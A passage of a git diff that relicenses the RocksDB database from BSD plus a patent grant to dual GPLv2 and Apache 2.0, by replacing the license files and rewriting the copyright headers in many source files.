util/threadpool_imp.cc | 8 +- util/threadpool_imp.h | 8 +- util/timer_queue.h | 6 +- util/timer_queue_test.cc | 6 +- util/transaction_test_util.cc | 6 +- util/transaction_test_util.h | 6 +- utilities/backupable/backupable_db.cc | 8 +- utilities/backupable/backupable_db_test.cc | 8 +- utilities/blob_db/blob_db.cc | 6 +- utilities/blob_db/blob_db.h | 8 +- utilities/blob_db/blob_db_impl.cc | 6 +- utilities/blob_db/blob_db_impl.h | 6 +- utilities/blob_db/blob_db_options_impl.cc | 6 +- utilities/blob_db/blob_db_options_impl.h | 6 +- utilities/blob_db/blob_db_test.cc | 6 +- utilities/blob_db/blob_dump_tool.cc | 8 +- utilities/blob_db/blob_dump_tool.h | 8 +- utilities/blob_db/blob_file.cc | 6 +- utilities/blob_db/blob_log_format.cc | 6 +- utilities/blob_db/blob_log_format.h | 6 +- utilities/blob_db/blob_log_reader.cc | 6 +- utilities/blob_db/blob_log_reader.h | 6 +- utilities/blob_db/blob_log_writer.cc | 6 +- utilities/blob_db/blob_log_writer.h | 6 +- utilities/checkpoint/checkpoint_impl.cc | 8 +- utilities/checkpoint/checkpoint_impl.h | 8 +- utilities/checkpoint/checkpoint_test.cc | 8 +- utilities/col_buf_decoder.cc | 6 +- utilities/col_buf_decoder.h | 6 +- utilities/col_buf_encoder.cc | 6 +- utilities/col_buf_encoder.h | 6 +- utilities/column_aware_encoding_exp.cc | 8 +- utilities/column_aware_encoding_test.cc | 8 +- utilities/column_aware_encoding_util.cc | 8 +- utilities/column_aware_encoding_util.h | 6 +- .../remove_emptyvalue_compactionfilter.cc | 6 +- .../remove_emptyvalue_compactionfilter.h | 6 +- utilities/convenience/info_log_finder.cc | 8 +- utilities/date_tiered/date_tiered_db_impl.h | 8 +- utilities/debug.cc | 8 +- utilities/document/document_db.cc | 8 +- utilities/document/document_db_test.cc | 8 +- utilities/document/json_document.cc | 8 +- utilities/document/json_document_builder.cc | 8 +- utilities/document/json_document_test.cc | 8 +- utilities/env_librados_test.cc | 8 +- utilities/env_mirror.cc | 6 +- utilities/env_mirror_test.cc | 8 +- utilities/env_timed.cc | 6 +- utilities/env_timed_test.cc | 6 +- utilities/geodb/geodb_impl.cc | 8 +- utilities/geodb/geodb_impl.h | 8 +- utilities/geodb/geodb_test.cc | 8 +- utilities/leveldb_options/leveldb_options.cc | 8 +- utilities/lua/rocks_lua_compaction_filter.cc | 8 +- utilities/lua/rocks_lua_test.cc | 8 +- utilities/memory/memory_test.cc | 6 +- utilities/memory/memory_util.cc | 6 +- utilities/merge_operators.h | 8 +- .../cassandra/cassandra_format_test.cc | 6 +- .../cassandra/cassandra_merge_test.cc | 6 +- .../cassandra/cassandra_row_merge_test.cc | 6 +- .../cassandra/cassandra_serialize_test.cc | 6 +- utilities/merge_operators/cassandra/format.cc | 6 +- utilities/merge_operators/cassandra/format.h | 6 +- .../cassandra/merge_operator.cc | 6 +- .../cassandra/merge_operator.h | 6 +- .../merge_operators/cassandra/serialize.h | 6 +- .../merge_operators/cassandra/test_utils.cc | 6 +- .../merge_operators/cassandra/test_utils.h | 6 +- utilities/merge_operators/max.cc | 8 +- utilities/merge_operators/put.cc | 8 +- utilities/merge_operators/uint64add.cc | 6 +- utilities/object_registry_test.cc | 6 +- .../option_change_migration.cc | 8 +- .../option_change_migration_test.cc | 8 +- utilities/options/options_util.cc | 6 +- utilities/options/options_util_test.cc | 8 +- .../persistent_cache/block_cache_tier.cc | 8 +- utilities/persistent_cache/block_cache_tier.h | 8 +- .../persistent_cache/block_cache_tier_file.cc | 8 +- .../persistent_cache/block_cache_tier_file.h | 8 +- .../block_cache_tier_file_buffer.h | 8 +- .../block_cache_tier_metadata.cc | 8 +- .../block_cache_tier_metadata.h | 8 +- utilities/persistent_cache/hash_table.h | 8 +- .../persistent_cache/hash_table_bench.cc | 8 +- .../persistent_cache/hash_table_evictable.h | 8 +- utilities/persistent_cache/hash_table_test.cc | 8 +- utilities/persistent_cache/lrulist.h | 8 +- .../persistent_cache_bench.cc | 8 +- .../persistent_cache/persistent_cache_test.cc | 8 +- .../persistent_cache/persistent_cache_test.h | 8 +- .../persistent_cache/persistent_cache_tier.cc | 8 +- .../persistent_cache/persistent_cache_tier.h | 8 +- .../persistent_cache/persistent_cache_util.h | 8 +- .../persistent_cache/volatile_tier_impl.cc | 8 +- .../persistent_cache/volatile_tier_impl.h | 8 +- utilities/redis/redis_lists_test.cc | 8 +- utilities/simulator_cache/sim_cache.cc | 8 +- utilities/simulator_cache/sim_cache_test.cc | 8 +- utilities/spatialdb/spatial_db.cc | 8 +- utilities/spatialdb/spatial_db_test.cc | 8 +- utilities/spatialdb/utils.h | 8 +- .../compact_on_deletion_collector.cc | 8 +- .../compact_on_deletion_collector.h | 8 +- .../compact_on_deletion_collector_test.cc | 8 +- .../optimistic_transaction_db_impl.cc | 8 +- .../optimistic_transaction_db_impl.h | 8 +- .../optimistic_transaction_impl.cc | 8 +- .../optimistic_transaction_impl.h | 6 +- .../optimistic_transaction_test.cc | 8 +- utilities/transactions/transaction_base.cc | 6 +- utilities/transactions/transaction_base.h | 6 +- utilities/transactions/transaction_db_impl.cc | 8 +- utilities/transactions/transaction_db_impl.h | 8 +- .../transactions/transaction_db_mutex_impl.cc | 8 +- .../transactions/transaction_db_mutex_impl.h | 8 +- utilities/transactions/transaction_impl.cc | 8 +- utilities/transactions/transaction_impl.h | 6 +- .../transactions/transaction_lock_mgr.cc | 8 +- utilities/transactions/transaction_lock_mgr.h | 8 +- utilities/transactions/transaction_test.cc | 8 +- utilities/transactions/transaction_util.cc | 8 +- utilities/transactions/transaction_util.h | 6 +- utilities/util_merge_operators_test.cc | 8 +- .../write_batch_with_index.cc | 8 +- .../write_batch_with_index_internal.cc | 8 +- .../write_batch_with_index_internal.h | 6 +- .../write_batch_with_index_test.cc | 8 +- 865 files changed, 2799 insertions(+), 3701 deletions(-) delete mode 100644 LICENSE create mode 100644 LICENSE.Apache delete mode 100644 PATENTS diff --git a/LICENSE b/LICENSE deleted file mode 100644 index 46f685e9681..00000000000 --- a/LICENSE +++ /dev/null @@ -1,35 +0,0 @@ -BSD License - -For rocksdb software - -Copyright (c) 2011-present, Facebook, Inc. -All rights reserved. ---------------------------------------------------------------------- - -Copyright (c) 2011 The LevelDB Authors. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/LICENSE.Apache b/LICENSE.Apache new file mode 100644 index 00000000000..d6456956733 --- /dev/null +++ b/LICENSE.Apache @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/PATENTS b/PATENTS deleted file mode 100644 index 65332e3a4e3..00000000000 --- a/PATENTS +++ /dev/null @@ -1,33 +0,0 @@ -Additional Grant of Patent Rights Version 2 - -"Software" means the RocksDB software distributed by Facebook, Inc. - -Facebook, Inc. ("Facebook") hereby grants to each recipient of the Software -("you") a perpetual, worldwide, royalty-free, non-exclusive, irrevocable -(subject to the termination provision below) license under any Necessary -Claims, to make, have made, use, sell, offer to sell, import, and otherwise -transfer the Software. For avoidance of doubt, no license is granted under -Facebook’s rights in any patent claims that are infringed by (i) modifications -to the Software made by you or any third party or (ii) the Software in -combination with any software or other technology. - -The license granted hereunder will terminate, automatically and without notice, -if you (or any of your subsidiaries, corporate affiliates or agents) initiate -directly or indirectly, or take a direct financial interest in, any Patent -Assertion: (i) against Facebook or any of its subsidiaries or corporate -affiliates, (ii) against any party if such Patent Assertion arises in whole or -in part from any software, technology, product or service of Facebook or any of -its subsidiaries or corporate affiliates, or (iii) against any party relating -to the Software. Notwithstanding the foregoing, if Facebook or any of its -subsidiaries or corporate affiliates files a lawsuit alleging patent -infringement against you in the first instance, and you respond by filing a -patent infringement counterclaim in that lawsuit against that party that is -unrelated to the Software, the license granted hereunder will not terminate -under section (i) of this paragraph due to such counterclaim. - -A "Necessary Claim" is a claim of a patent owned by Facebook that is -necessarily infringed by the Software standing alone. - -A "Patent Assertion" is any lawsuit or other action alleging direct, indirect, -or contributory infringement or inducement to infringe any patent, including a -cross-claim or counterclaim. diff --git a/build_tools/error_filter.py b/build_tools/error_filter.py index f655ba09511..9f619cf4ba5 100644 --- a/build_tools/error_filter.py +++ b/build_tools/error_filter.py @@ -1,7 +1,7 @@ -# Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -# This source code is licensed under the BSD-style license found in the -# LICENSE file in the root directory of this source tree. An additional grant -# of patent rights can be found in the PATENTS file in the same directory. +# Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +# This source code is licensed under both the GPLv2 (found in the +# COPYING file in the root directory) and Apache 2.0 License +# (found in the LICENSE.Apache file in the root directory). '''Filter for error messages in test output: - Receives merged stdout/stderr from test on stdin diff --git a/cache/cache_bench.cc b/cache/cache_bench.cc index fda11b8696a..16c2ced1dde 100644 --- a/cache/cache_bench.cc +++ b/cache/cache_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS diff --git a/cache/cache_test.cc b/cache/cache_test.cc index 271cb0e6d80..8e241226d9c 100644 --- a/cache/cache_test.cc +++ b/cache/cache_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc index afcf6345c5d..db9d1438e22 100644 --- a/cache/clock_cache.cc +++ b/cache/clock_cache.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/cache/clock_cache.h b/cache/clock_cache.h index 2e5389d5cd1..1614c0ed454 100644 --- a/cache/clock_cache.h +++ b/cache/clock_cache.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index 4751c0b1328..b201d81a4da 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 28f87193ed9..4b6a9f2fec3 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/cache/lru_cache_test.cc b/cache/lru_cache_test.cc index d7e661a1279..87794fd1617 100644 --- a/cache/lru_cache_test.cc +++ b/cache/lru_cache_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "cache/lru_cache.h" diff --git a/cache/sharded_cache.cc b/cache/sharded_cache.cc index 81e7122e434..9bdea3a08e1 100644 --- a/cache/sharded_cache.cc +++ b/cache/sharded_cache.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/cache/sharded_cache.h b/cache/sharded_cache.h index c2d52c840b3..4f9dea2ad0f 100644 --- a/cache/sharded_cache.h +++ b/cache/sharded_cache.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/builder.cc b/db/builder.cc index a0c3fb305b0..6f973fdbd5b 100644 --- a/db/builder.cc +++ b/db/builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/builder.h b/db/builder.h index 1f8102df1d9..a432a753182 100644 --- a/db/builder.h +++ b/db/builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/db/c.cc b/db/c.cc index cc359b2c183..441ffade3b6 100644 --- a/db/c.cc +++ b/db/c.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/column_family.cc b/db/column_family.cc index e32c653686c..b00eda0747d 100644 --- a/db/column_family.cc +++ b/db/column_family.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/column_family.h b/db/column_family.h index 9a6f15d3ca6..3a807d22b91 100644 --- a/db/column_family.h +++ b/db/column_family.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/column_family_test.cc b/db/column_family_test.cc index 7621f3974ee..0d5f2dcf232 100644 --- a/db/column_family_test.cc +++ b/db/column_family_test.cc @@ -1,8 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in -// the LICENSE file in the root directory of this source tree. An -// additional grant of patent rights can be found in the PATENTS file -// in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compact_files_test.cc b/db/compact_files_test.cc index 3dc9aac3a98..5aad6114f5e 100644 --- a/db/compact_files_test.cc +++ b/db/compact_files_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/compacted_db_impl.cc b/db/compacted_db_impl.cc index 955d8bc3bc0..d1007d972a1 100644 --- a/db/compacted_db_impl.cc +++ b/db/compacted_db_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "db/compacted_db_impl.h" diff --git a/db/compacted_db_impl.h b/db/compacted_db_impl.h index ec8ea2baa87..de32f21e681 100644 --- a/db/compacted_db_impl.h +++ b/db/compacted_db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/db/compaction.cc b/db/compaction.cc index bb2384a3598..ea2c011a45c 100644 --- a/db/compaction.cc +++ b/db/compaction.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction.h b/db/compaction.h index 0167b16f4c4..7be6df2c1e8 100644 --- a/db/compaction.h +++ b/db/compaction.h @@ -1,9 